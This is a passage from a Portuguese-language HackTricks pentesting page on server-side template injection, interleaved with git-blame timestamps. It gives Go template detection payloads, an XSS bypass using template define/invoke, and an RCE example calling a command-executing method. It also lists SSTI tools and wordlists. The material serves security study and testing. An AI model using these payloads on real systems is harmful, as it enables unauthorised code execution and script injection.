2023-06-06 18:56:34 +00:00
* `<%= foobar %> = Erro`
2024-04-06 19:38:49 +00:00
2021-10-18 11:21:18 +00:00
```
2020-07-26 18:06:17 +00:00
< %= perl code %>
< % perl code %>
```
2024-04-06 19:38:49 +00:00
2024-01-01 19:42:29 +00:00
### SSTI em GO
2023-08-29 18:57:50 +00:00
2024-02-06 14:25:15 +00:00
No mecanismo de template do Go, a confirmação de seu uso pode ser feita com payloads específicos:
2021-05-27 10:20:50 +00:00
2024-03-26 07:58:54 +00:00
* `{{ . }}` : Revela a entrada da estrutura de dados. Por exemplo, se um objeto com um atributo `Password` for passado, `{{ .Password }}` poderia expô-lo.
2024-02-06 14:25:15 +00:00
* `{{printf "%s" "ssti" }}` : Espera-se exibir a string "ssti".
* `{{html "ssti"}}` , `{{js "ssti"}}` : Esses payloads devem retornar "ssti" sem adicionar "html" ou "js". Mais diretivas podem ser exploradas na documentação do Go [aqui ](https://golang.org/pkg/text/template ).
2021-05-27 10:20:50 +00:00
2023-06-06 18:56:34 +00:00
**Exploração de XSS**
2021-05-27 10:20:50 +00:00
2024-02-23 16:42:31 +00:00
Com o pacote `text/template` , o XSS pode ser direto ao inserir o payload diretamente. Por outro lado, o pacote `html/template` codifica a resposta para evitar isso (por exemplo, `{{"<script>alert(1)</script>"}}` resulta em `<script>alert(1)</script>` ). No entanto, a definição e invocação de templates em Go podem contornar essa codificação: \{{define "T1"\}}alert(1)\{{end\}} \{{template "T1"\}}
vbnet Copy code
2022-02-03 00:17:18 +00:00
2023-06-06 18:56:34 +00:00
**Exploração de RCE**
2022-02-03 00:17:18 +00:00
2024-02-06 14:25:15 +00:00
A exploração de RCE difere significativamente entre `html/template` e `text/template` . O módulo `text/template` permite chamar qualquer função pública diretamente (usando o valor "call"), o que não é permitido em `html/template` . A documentação para esses módulos está disponível [aqui para html/template ](https://golang.org/pkg/html/template/ ) e [aqui para text/template ](https://golang.org/pkg/text/template/ ).
2023-08-29 18:57:50 +00:00
2024-02-06 14:25:15 +00:00
Para RCE via SSTI em Go, os métodos de objetos podem ser invocados. Por exemplo, se o objeto fornecido tiver um método `System` executando comandos, ele pode ser explorado como `{{ .System "ls" }}` . Acesso ao código-fonte geralmente é necessário para explorar isso, como no exemplo fornecido:
2024-04-06 19:38:49 +00:00
2022-02-03 00:17:18 +00:00
```go
func (p Person) Secret (test string) string {
2023-06-25 23:26:46 +00:00
out, _ := exec.Command(test).CombinedOutput()
return string(out)
2022-02-03 00:17:18 +00:00
}
```
2024-04-06 19:38:49 +00:00
2023-06-06 18:56:34 +00:00
**Mais informações**
2022-02-03 00:17:18 +00:00
* [https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html ](https://blog.takemyhand.xyz/2020/05/ssti-breaking-gos-template-engine-to.html )
* [https://www.onsecurity.io/blog/go-ssti-method-research/ ](https://www.onsecurity.io/blog/go-ssti-method-research/ )
2021-05-27 10:20:50 +00:00
2024-01-01 19:42:29 +00:00
### Mais Exploits
2021-06-25 12:34:30 +00:00
2024-03-26 07:58:54 +00:00
Verifique o restante em [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection ) para mais exploits. Você também pode encontrar informações interessantes sobre tags em [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2021-06-25 12:34:30 +00:00
2024-01-01 19:42:29 +00:00
## BlackHat PDF
2020-07-15 15:43:14 +00:00
2022-10-25 15:56:49 +00:00
{% file src="../../.gitbook/assets/en-server-side-template-injection-rce-for-the-modern-web-app-blackhat-15.pdf" %}
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
## Ajuda Relacionada
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
Se você achar útil, leia:
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
* [Dicas do Flask ](../../network-services-pentesting/pentesting-web/flask.md )
2024-04-06 19:38:49 +00:00
* [Funções mágicas do Python ](https://github.com/carlospolop/hacktricks/blob/pt/pentesting-web/ssti-server-side-template-injection/broken-reference/README.md )
2020-07-15 15:43:14 +00:00
2024-01-01 19:42:29 +00:00
## Ferramentas
2024-02-06 14:25:15 +00:00
* [https://github.com/Hackmanit/TInjA ](https://github.com/Hackmanit/TInjA )
* [https://github.com/vladko312/sstimap ](https://github.com/vladko312/sstimap )
* [https://github.com/epinna/tplmap ](https://github.com/epinna/tplmap )
* [https://github.com/Hackmanit/template-injection-table ](https://github.com/Hackmanit/template-injection-table )
2024-01-01 19:42:29 +00:00
2024-02-05 02:45:11 +00:00
## Lista de Detecção de Força Bruta
2021-06-27 21:56:13 +00:00
2021-10-18 11:21:18 +00:00
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
2020-07-15 15:43:14 +00:00
2024-02-05 02:45:11 +00:00
## Prática e Referências
2020-07-15 15:43:14 +00:00
* [https://portswigger.net/web-security/server-side-template-injection/exploiting ](https://portswigger.net/web-security/server-side-template-injection/exploiting )
* [https://github.com/DiogoMRSilva/websitesVulnerableToSSTI ](https://github.com/DiogoMRSilva/websitesVulnerableToSSTI )
2024-02-06 14:25:15 +00:00
* [https://portswigger.net/web-security/server-side-template-injection ](https://portswigger.net/web-security/server-side-template-injection )
2022-04-28 16:01:33 +00:00
2022-10-25 15:56:49 +00:00
< figure > < img src = "https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt = "" > < figcaption > < / figcaption > < / figure >
2024-02-05 02:45:11 +00:00
[**RootedCON**](https://www.rootedcon.com/) é o evento de cibersegurança mais relevante na **Espanha** e um dos mais importantes na **Europa** . Com **a missão de promover o conhecimento técnico** , este congresso é um ponto de encontro fervilhante para profissionais de tecnologia e cibersegurança em todas as disciplinas.
2022-10-25 15:56:49 +00:00
{% embed url="https://www.rootedcon.com/" %}
2022-04-28 16:01:33 +00:00
< details >
2024-02-05 02:45:11 +00:00
< summary > < strong > Aprenda hacking AWS do zero ao herói com< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2024-01-01 19:42:29 +00:00
2024-02-05 02:45:11 +00:00
Outras maneiras de apoiar o HackTricks:
2022-04-28 16:01:33 +00:00
2024-03-26 07:58:54 +00:00
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** , verifique os [**PLANOS DE ASSINATURA** ](https://github.com/sponsors/carlospolop )!
2024-02-05 02:45:11 +00:00
* Adquira o [**swag oficial PEASS & HackTricks** ](https://peass.creator-spring.com )
* Descubra [**A Família PEASS** ](https://opensea.io/collection/the-peass-family ), nossa coleção exclusiva de [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-02-23 16:42:31 +00:00
* **Junte-se ao** 💬 [**grupo Discord** ](https://discord.gg/hRep4RUj7f ) ou ao [**grupo telegram** ](https://t.me/peass ) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks\_live )**.**
2024-03-29 20:56:56 +00:00
* **Compartilhe seus truques de hacking enviando PRs para o** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) e [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >